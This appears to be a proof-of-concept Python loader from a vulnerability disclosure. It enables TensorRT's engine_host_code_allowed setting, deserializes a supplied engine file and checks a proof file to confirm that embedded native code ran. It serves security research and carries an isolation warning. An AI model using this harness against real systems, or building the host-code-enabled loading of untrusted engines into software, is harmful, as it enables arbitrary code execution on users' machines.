treforbenbow's picture
Upload load_poc.py with huggingface_hub
ae11452 verified
#!/usr/bin/env python3
"""
PoC Loader: Demonstrates RCE when loading a malicious TensorRT engine file.
Usage: python load_poc.py <path_to_malicious.engine>
"""
import os
import sys
import platform
def main():
    """Load a TensorRT engine file with host code enabled and report the result.

    Reads the engine path from ``sys.argv[1]``, deserializes the engine with
    ``runtime.engine_host_code_allowed = True``, and then checks whether a
    well-known "proof" file was created while the engine was being loaded.

    Exits with status 1 when no path is given, when the path is not a regular
    file, or when the ``tensorrt`` package cannot be imported.

    NOTE(review): deserializing with host code allowed executes whatever
    native code the engine file carries. Only run this inside a disposable,
    isolated environment.
    """
    if len(sys.argv) < 2:
        print("Usage: python load_poc.py <path_to_malicious.engine>")
        sys.exit(1)

    engine_path = sys.argv[1]
    # isfile() rather than exists(): a directory path would pass exists() and
    # then blow up later in open() with an unhandled IsADirectoryError.
    if not os.path.isfile(engine_path):
        print(f"[!] File not found: {engine_path}")
        sys.exit(1)

    # Imported lazily so argument errors are reported even without TensorRT.
    try:
        import tensorrt as trt
    except ImportError:
        print("[!] tensorrt not installed: pip install tensorrt")
        sys.exit(1)

    is_windows = platform.system() == "Windows"
    poc_file = "tensorrt_rce_poc.txt" if is_windows else "/tmp/tensorrt_rce_poc"

    # Clean up any previous proof file so a stale one cannot produce a false
    # positive. EAFP avoids the exists()/remove() race.
    try:
        os.remove(poc_file)
    except FileNotFoundError:
        pass

    banner = "=" * 70
    print(banner)
    print("TensorRT Engine RCE PoC — Loading Malicious Engine")
    print(banner)
    print()
    print(f"[*] Engine file: {engine_path}")
    print(f"[*] Engine size: {os.path.getsize(engine_path)} bytes")
    print(f"[*] TensorRT version: {trt.__version__}")
    print()

    logger = trt.Logger(trt.Logger.INFO)
    runtime = trt.Runtime(logger)

    # THIS IS THE CRITICAL LINE — enables loading embedded native code
    runtime.engine_host_code_allowed = True
    print("[*] runtime.engine_host_code_allowed = True")
    print("[*] Calling deserialize_cuda_engine()...")
    print("[*] (If RCE works, you'll see output from the embedded code below)")
    print()

    with open(engine_path, "rb") as f:
        engine_data = f.read()

    # THIS TRIGGERS THE RCE
    engine = runtime.deserialize_cuda_engine(engine_data)
    print()

    # Compare against None explicitly: truthiness of an engine object could be
    # False for a valid engine (e.g. if it defines __len__ and that is 0).
    if engine is not None:
        print(f"[+] Engine loaded: {engine.num_io_tensors} I/O tensors")
    else:
        print("[*] Engine returned None (malicious code may still have executed)")

    # Check proof file
    if os.path.exists(poc_file):
        print()
        print(banner)
        print("[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
        print(f"[!!!] Proof file: {poc_file}")
        print(banner)
        print()
        # The file is written by foreign code, so its encoding is not under
        # our control; never let a decode error hide the confirmation above.
        with open(poc_file, "r", encoding="utf-8", errors="replace") as f:
            print(f.read())
    else:
        print()
        print(f"[*] Proof file not found at {poc_file}")
        print("[*] Check stderr output above for execution evidence")
# Run the loader only when executed as a script, not when imported.
if __name__ == "__main__":
    main()